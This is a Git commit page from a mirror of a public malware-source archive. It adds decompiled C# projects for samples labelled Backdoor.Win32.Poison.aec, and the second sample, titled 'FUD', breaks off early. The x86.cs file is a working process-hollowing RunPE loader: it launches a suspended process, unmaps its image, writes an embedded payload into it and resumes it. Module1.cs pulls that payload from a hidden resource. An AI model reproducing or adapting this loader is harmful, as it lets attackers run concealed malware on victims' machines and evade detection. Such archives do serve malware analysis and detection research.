daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-21 02:09:25 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyDescription("1")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyCopyright("Copyright © 2010")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyTitle("Cursor")]
[assembly: AssemblyProduct("Cursor")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("728093e4-7457-46be-8e8e-0fdee382cfff")]
[assembly: ComVisible(false)]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/Backdoor.Win32.Poison.aec.csproj
+52
View File
@@ -0,0 +1,52 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{CFD318BA-72D0-41F6-BAD3-1B05A5894626}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Cursor</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Cursor</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="x86.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/Backdoor.Win32.Poison.aec.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Cursor", "Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.csproj", "{CFD318BA-72D0-41F6-BAD3-1B05A5894626}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{CFD318BA-72D0-41F6-BAD3-1B05A5894626}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{CFD318BA-72D0-41F6-BAD3-1B05A5894626}.Debug|Any CPU.Build.0 = Debug|Any CPU
{CFD318BA-72D0-41F6-BAD3-1B05A5894626}.Release|Any CPU.ActiveCfg = Release|Any CPU
{CFD318BA-72D0-41F6-BAD3-1B05A5894626}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/Module1.cs
+42
View File
@@ -0,0 +1,42 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.Module1
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B3356960-2D13-4E8B-9A22-3EBE56F6B0CE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Cursor
{
[StandardModule]
internal sealed class Module1
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
[STAThread]
public static void Main()
{
string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
IntPtr resource = Module1.FindResource(moduleHandle, "69", "GAY");
IntPtr source = Module1.LoadResource(moduleHandle, resource);
int length = Module1.SizeofResource(moduleHandle, resource);
byte[] numArray = new byte[checked (length - 1 + 1)];
Marshal.Copy(source, numArray, 0, length);
x86.RunPE(numArray, Process.GetCurrentProcess().MainModule.FileName);
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/My/MyApplication.cs
+23
View File
@@ -0,0 +1,23 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyApplication
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B3356960-2D13-4E8B-9A22-3EBE56F6B0CE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ConsoleApplicationBase
{
[DebuggerNonUserCode]
public MyApplication()
{
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyComputer
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B3356960-2D13-4E8B-9A22-3EBE56F6B0CE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace Cursor.My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/My/MyProject.cs
+194
View File
@@ -0,0 +1,194 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyProject
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B3356960-2D13-4E8B-9A22-3EBE56F6B0CE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace Cursor.My
{
[StandardModule]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[HideModuleName]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/My/MySettings.cs
+29
View File
@@ -0,0 +1,29 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MySettings
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B3356960-2D13-4E8B-9A22-3EBE56F6B0CE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
[CompilerGenerated]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
[DebuggerNonUserCode]
public MySettings()
{
}
public static MySettings Default => MySettings.defaultInstance;
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/My/MySettingsProperty.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MySettingsProperty
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B3356960-2D13-4E8B-9A22-3EBE56F6B0CE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Cursor.My
{
[CompilerGenerated]
[DebuggerNonUserCode]
[HideModuleName]
[StandardModule]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/My/Resources/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.Resources.Resources
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B3356960-2D13-4E8B-9A22-3EBE56F6B0CE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Cursor.My.Resources
{
[DebuggerNonUserCode]
[CompilerGenerated]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[StandardModule]
[HideModuleName]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) Cursor.My.Resources.Resources.resourceMan, (object) null))
Cursor.My.Resources.Resources.resourceMan = new ResourceManager("Cursor.Resources", typeof (Cursor.My.Resources.Resources).Assembly);
return Cursor.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Cursor.My.Resources.Resources.resourceCulture;
set => Cursor.My.Resources.Resources.resourceCulture = value;
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8/x86.cs
+170
View File
@@ -0,0 +1,170 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.x86
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B3356960-2D13-4E8B-9A22-3EBE56F6B0CE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Text;
namespace Cursor
{
public class x86
{
private static readonly int[] prot = new int[8]
{
1,
16,
2,
32,
4,
64,
4,
64
};
[DebuggerNonUserCode]
public x86()
{
}
public static void RunPE(byte[] bytes, string surrogateProcess)
{
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, checked (int32 + 6));
IntPtr size1 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 84)));
byte[] sInfo = new byte[68];
IntPtr[] pInfo = new IntPtr[4];
IntPtr num1;
if (!x86.Win32.CreateProcess((string) null, new StringBuilder(surrogateProcess), num1, num1, false, 4, num1, (string) null, sInfo, pInfo))
return;
uint[] ctxt = new uint[179];
ctxt[0] = 65538U;
IntPtr bufr;
IntPtr numRead;
if (x86.Win32.GetThreadContext(pInfo[1], ctxt) && x86.Win32.ReadProcessMemory(pInfo[0], new IntPtr(checked ((long) ctxt[41] + 8L)), ref bufr, new IntPtr(4), ref numRead) && x86.Win32.NtUnmapViewOfSection(pInfo[0], bufr) == 0U)
{
IntPtr hProc1 = pInfo[0];
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 52)));
IntPtr addr1 = num2;
IntPtr num3 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 80)));
IntPtr size2 = num3;
IntPtr baseAddr1 = x86.Win32.VirtualAllocEx(hProc1, addr1, size2, 12288, 64);
bool flag = x86.Win32.WriteProcessMemory(pInfo[0], baseAddr1, bytes, size1, ref numRead);
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst1 = new int[10];
Buffer.BlockCopy((Array) bytes, checked (int32 + 248 + num5 * 40), (Array) dst1, 0, 40);
byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
Buffer.BlockCopy((Array) bytes, dst1[5], (Array) dst2, 0, dst2.Length);
IntPtr hProc2 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr baseAddr2 = num3;
byte[] buff = dst2;
num2 = new IntPtr(dst2.Length);
IntPtr size3 = num2;
ref IntPtr local1 = ref numRead;
flag = x86.Win32.WriteProcessMemory(hProc2, baseAddr2, buff, size3, ref local1);
IntPtr hProc3 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr addr2 = num3;
num2 = new IntPtr(dst1[2]);
IntPtr size4 = num2;
int newProt = x86.prot[dst1[9] >> 29 & 7];
int num6;
ref int local2 = ref num6;
flag = x86.Win32.VirtualProtectEx(hProc3, addr2, size4, newProt, ref local2);
checked { ++num5; }
}
IntPtr hProc4 = pInfo[0];
num3 = new IntPtr(checked ((long) ctxt[41] + 8L));
IntPtr baseAddr3 = num3;
byte[] bytes1 = BitConverter.GetBytes(baseAddr1.ToInt32());
num2 = new IntPtr(4);
IntPtr size5 = num2;
ref IntPtr local = ref numRead;
flag = x86.Win32.WriteProcessMemory(hProc4, baseAddr3, bytes1, size5, ref local);
ctxt[44] = checked ((uint) (baseAddr1.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40)));
x86.Win32.SetThreadContext(pInfo[1], ctxt);
}
x86.Win32.ResumeThread(pInfo[1]);
}
[SuppressUnmanagedCodeSecurity]
private class Win32
{
[DebuggerNonUserCode]
public Win32()
{
}
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("ntdll")]
public static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
IntPtr bufrSize,
ref IntPtr numRead);
[DllImport("kernel32")]
public static extern int ResumeThread(IntPtr hThr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
public static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool VirtualProtectEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int newProt,
ref int oldProt);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool WriteProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
byte[] buff,
IntPtr size,
ref IntPtr numRead);
}
}
}
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCopyright("Copyright © 1907 2011")]
[assembly: AssemblyTitle("FUD")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyProduct("FUD")]
[assembly: AssemblyCompany("1907")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("7aa9f012-f8f7-4835-af23-c23f7bce6890")]
[assembly: ComVisible(false)]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Backdoor/Win32/P/Backdoor.Win32.Poison.aec-4886f6c9f45d8971ab31a20a21e3b704c1278d1a1eac172c181a0c1f50c44e49/Backdoor.Win32.Poison.aec.csproj
+53
View File
@@ -0,0 +1,53 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
